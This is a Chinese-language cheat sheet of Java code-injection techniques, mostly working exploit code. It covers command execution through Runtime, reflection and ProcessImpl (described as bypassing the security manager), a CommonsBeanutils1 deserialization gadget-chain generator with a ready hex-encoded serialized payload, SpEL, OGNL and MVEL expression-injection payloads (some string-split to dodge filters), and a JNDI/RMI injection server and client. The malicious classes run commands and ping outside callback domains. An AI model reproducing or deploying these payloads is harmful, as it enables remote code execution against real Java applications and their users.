代码注入(常见汇总)
代码注入常用方法:
1:Runtime
Runtime.getRuntime().exec("calc");反射:
Class.forName("java.lang.Runtime").getMethod("exec", String.class).invoke(Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime")),"calc");执行命令并返回结果:
String s=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).lines().collect(Collectors.joining("n"));2:ScriptEngineManager
ScriptEngineManager scriptEngineManager=new ScriptEngineManager();
scriptEngineManager.getEngineByName("javascript").eval("java.lang.Runtime.getRuntime().exec('calc')");3:ProcessBuilder
ProcessBuilder processBuilder=new ProcessBuilder("cmd","/c","dir");
Process process=processBuilder.start();4:ProcessImpl
可以绕过安全管理器
Class clz = Class.forName("java.lang.ProcessImpl");
Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
method.setAccessible(true);
method.invoke(clz,new String[]{"calc"},null,null,null,false);5:SerializationUtils
User user=new User();
//生成对象的二进制字节数组,并将二进制数组转换为16进制字符
byte[] userbyte= SerializationUtils.serialize(user);
String userHex= DatatypeConverter.printHexBinary(userbyte);
System.out.println("user对象16进制:"+userHex);
//16进制字符转换为二进制字节数组,并将二进制转换回对象
byte[] userbute2=DatatypeConverter.parseHexBinary(userHex);
User userobject=SerializationUtils.deserialize(userbute2);
System.out.println(userobject.Name);1.反序列化
1.1反序列化payload生成
代码:
序列化数据生成
public static byte[] CommonsBeanutils1() throws Exception {
// createTemplatesImpl方法生成攻击载荷
TemplatesImpl obj = new TemplatesImpl();
// 插入恶意字节码
setFieldValue(obj, "_bytecodes", new byte[][]{
ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode()
});
setFieldValue(obj, "_name", "HelloTemplatesImpl");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add("1");
queue.add("1");
setFieldValue(comparator, "property", "outputProperties");
setFieldValue(queue, "queue", new Object[]{obj, obj});
// 生成序列化字符串,可根据实际需要修改序列化库
//RedisSerializer serializer = new JdkSerializationRedisSerializer();
byte[] bt=SerializationUtils.serialize(queue);
// byte[] d = serializer.serialize(queue);
String hex= DatatypeConverter.printHexBinary(bt);
System.out.println(hex);
GzipUtils gzipUtils=new GzipUtils();
//String base64=gzipUtils.gzip(hex);
//int length=base64.length();
// 输出序列化字符串至指定文件jalorCommonsBeanutils1.binary
//String hex2=gzipUtils.jyZip(base64);
ObjectOutputStream oos1 = new ObjectOutputStream(new FileOutputStream(new File("jalorCommonsBeanutils1.binary")));
oos1.write(bt);
oos1.close();
//serializer.deserialize(bt);
SerializationUtils.deserialize(bt);
return bt;
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}恶意代码类
public class EvilTemplatesImpl extends AbstractTranslet {
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
public EvilTemplatesImpl() throws Exception {
super();
System.out.println("Hello TemplatesImpl");
//Runtime.getRuntime().exec("touch /tmp/dsptest01");
Runtime.getRuntime().exec("calc");
//Runtime.getRuntime().exec("ping wmfhaha.bbb.faoxx.online");
}
}1.2利用
byte[] userTestByte3=DatatypeConverter.parseHexBinary("ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372002A6A6176612E6C616E672E537472696E672443617365496E73656E736974697665436F6D70617261746F7277035C7D5C50E5CE02000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E00200007870000005FFCAFEBABE00000034003A0A0009002109002200230800240A002500260A002700280800290A0027002A07002B07002C0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100184C6576696C2F4576696C54656D706C61746573496D706C3B010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E7307002D0100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B0100063C696E69743E01000328295607002E01000A536F7572636546696C650100164576696C54656D706C61746573496D706C2E6A6176610C001C001D07002F0C0030003101001348656C6C6F2054656D706C61746573496D706C0700320C003300340700350C0036003701000463616C630C003800390100166576696C2F4576696C54656D706C61746573496D706C010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C6574010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E0100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F53797374656D0100036F75740100154C6A6176612F696F2F5072696E7453747265616D3B0100136A6176612F696F2F5072696E7453747265616D0100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B29560100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000800090000000000030001000A000B0002000C0000003F0000000300000001B100000002000D0000000600010000000A000E00000020000300000001000F001000000000000100110012000100000001001300140002001500000004000100160001000A00170002000C000000490000000400000001B100000002000D0000000600010000000C000E0000002A000400000001000F00100000000000010011001200010000000100180019000200000001001A001B0003001500000004000100160001001C001D0002000C0000004C00020001000000162AB70001B200021203B60004B800051206B6000757B100000002000D0000001200040000000F00040010000C001200150015000E0000000C000100000016000F001000000015000000040001001E0001001F0000000200207074001248656C6C6F54656D706C61746573496D706C707701007871007E000D78");
SerializationUtils.deserialize(userTestByte3);
2.spel表达式注入
2.1使用方式
public void test2(){
String spel = "#name1";
ExpressionParser parser=new SpelExpressionParser();
Expression expression=parser.parseExpression(spel);
EvaluationContext context=new StandardEvaluationContext();
context.setVariable("name1","zhangsan");
context.setVariable("name2","zhangsan2");
System.out.println("你好:"+expression.getValue(context));
}2.2利用
public void test5(){
System.out.println("----------------");
// String spel = "T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"cmd\",\"/C\",\"calc\"})\n";
// String spel ="new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"java.lang.Runtime.getRuntime().exec('calc')\")";
String spel ="T(java.lang.Runtime).getRuntime().exec(\"calc\")";
ExpressionParser parser=new SpelExpressionParser();
Expression expression=parser.parseExpression(spel);
EvaluationContext context=new StandardEvaluationContext();
expression.getValue(context);
}
3.OGNL表达式注入
3.1使用方式
public void test6() throws OgnlException {
System.out.println("----------------");
User user1 = new User();
user1.setId("100");
user1.setName("Jack");
OgnlContext context=new OgnlContext();
context.put("cd","China");
context.put("user",user1);
Object o1=Ognl.getValue("1+1",context,context.getRoot());
Object o2=Ognl.getValue("#cd",context,context.getRoot());
Object o3=Ognl.getValue("new java.lang.String(\"666\")",context);
Object o4=Ognl.getValue("getId()",context,user1);
Object o41=Ognl.getValue("#user.name",context,user1);
Object o42=Ognl.getValue("@Math@floor(10.9)",context,user1);
Object ognl=Ognl.parseExpression("@Math@floor(10.9)");
Object o43=Ognl.getValue(ognl,context,user1);
// Object ognl2=Ognl.parseExpression("@java.lang.Runtime@getRuntime().exec('calc')");
// Object o44=Ognl.getValue(ognl2,context,user1);
Object o5=Ognl.getValue("@Class@forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('calc')\")",null);
// Object o6=Ognl.getValue("(new java.lang.ProcessBuilder(new java.lang.String[]{\"calc\"})).start()",null);
// Object o7=Ognl.getValue("@java.lang.Runtime@getRuntime().exec('calc')",null);
System.out.println(o1);
System.out.println(o2);
System.out.println(o3);
System.out.println(o4);
System.out.println(o41);
System.out.println(o42);
System.out.println(o43);
}3.2利用
Object o5=Ognl.getValue("new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"java.lang.Runtime.getRuntime().exec('calc')\")",null);4.MVEL表达式注入
4.1使用方式
String payload="Runtime.getRuntime().exec(\"calc\");";
System.out.println(MVEL.eval(payload));
Serializable serializable= MVEL.compileExpression("1==1;java.lang.Runtime.getRuntime().exec('calc');1==1");
Object result=MVEL.executeExpression(serializable);
System.out.println(result);4.2利用
5.jndi注入
5.1使用方式
服务端
public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
String url = "http://10.70.103.157:7878/";
Registry registry= LocateRegistry.createRegistry(1099);
Reference reference=new Reference("","EvilTest",url);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("test1",referenceWrapper);
System.out.println("服务端启动");
}
客户端
public static void main(String[] args) throws NamingException {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
String url = "rmi://10.70.103.157:1099/test1";//rmi方式
// String url = "ldap://10.70.103.157:1389/aaa";//ldap方式
InitialContext initialContext=new InitialContext();
initialContext.lookup(url);
System.out.println("客户端调用,执行恶意代码");
}
恶意代码
public class EvilTest extends AbstractTranslet {
public EvilTest() throws IOException {
System.out.println("Hello EvilTest");
Runtime.getRuntime().exec("calc");
Runtime.getRuntime().exec("ping www.b.faoxxabc.shop");
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}